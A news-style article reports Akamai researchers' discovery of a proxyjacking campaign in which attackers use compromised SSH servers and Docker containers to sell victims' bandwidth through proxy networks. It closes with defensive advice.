An active and lucrative cyber attack campaign has been discovered by researchers at the Akamai Security Intelligence Response Team (SIRT). The campaign involves threat actors exploiting vulnerable secure shell protocol (SSH) servers to launch Docker services that hijack a victim’s network bandwidth for financial gain. This emerging attack vector, known as proxyjacking, allows attackers to enlist victim servers into a peer-to-peer (P2P) proxy network without their knowledge.
Proxyjacking involves threat actors using SSH for remote access to victim servers and then running malicious scripts that connect them to legitimate proxy networks, such as Peer2Proxy or Honeygain. These networks allow users to share their internet bandwidth for a fee, and by enlisting victim servers, attackers can monetize their extra bandwidth with minimal resource load and less chance of discovery compared to other methods like cryptomining.
The researchers found that proxyjacking has the potential to earn cybercriminals hundreds of thousands of dollars per month in passive income. While the concept of proxyjacking is not entirely new, the ability to easily monetize it through mainstream companies is. This has led to an increase in proxyjacking attacks, posing a threat to both the corporate world and average consumers.
One of the advantages of proxyjacking for threat actors is the ability to hide their tracks by routing malicious traffic through multiple peer nodes before reaching its final destination. This makes it difficult for victims or researchers to pinpoint the origin of the nefarious activity, providing an attractive option for attackers looking to monetize their actions without facing consequences.
The researchers at Akamai identified the proxyjacking attack by decoding a double Base64-encoded Bash script used by an attacker to establish multiple SSH connections to one of their honeypots. The script transformed the compromised system into a node in the proxy network, allowing the attacker to profit from the shared bandwidth. The attackers employed stealthy and robust techniques to ensure the script operates regardless of the software installed on the victim host.
The script also downloaded an unmodified version of cURL, a command-line tool for data exchange between devices and servers. The tool served as the main component for the proxyjacking process, and if not present on the victim host, the attacker downloaded it on their behalf. Ultimately, the attackers installed a Docker container to handle the proxyjacking process and left the network without leaving a trace.
To defend against proxyjacking attacks, organizations should maintain vigilance on their networks to detect any abnormal behavior in bandwidth usage. For this specific attack, organizations can check their locally running Docker services to identify any unwanted resources sharing the system. If any are found, a thorough investigation should be conducted to determine how the script was uploaded and run, followed by a comprehensive clean-up.
A unique aspect of this attack is the use of the cURL tool, which can be used legitimately and could easily go unnoticed by most companies. However, in this case, it was the initial artifact that led the researchers to investigate further. This highlights the importance of isolating all unusual artifacts, not just those considered malicious.
Additionally, organizations should ensure their assets are up to date and apply patches to applications whenever available, particularly in cases where vulnerabilities have already been exploited. Users with deeper knowledge of computer security can also remain vigilant by monitoring running containers, detecting anomalies in network traffic, and regularly running vulnerability scans.
The discovery of this active proxyjacking campaign highlights the growing threat and need for awareness and mitigation. By understanding the attack vector and implementing appropriate defenses, organizations can better protect themselves from falling victim to these lucrative attacks.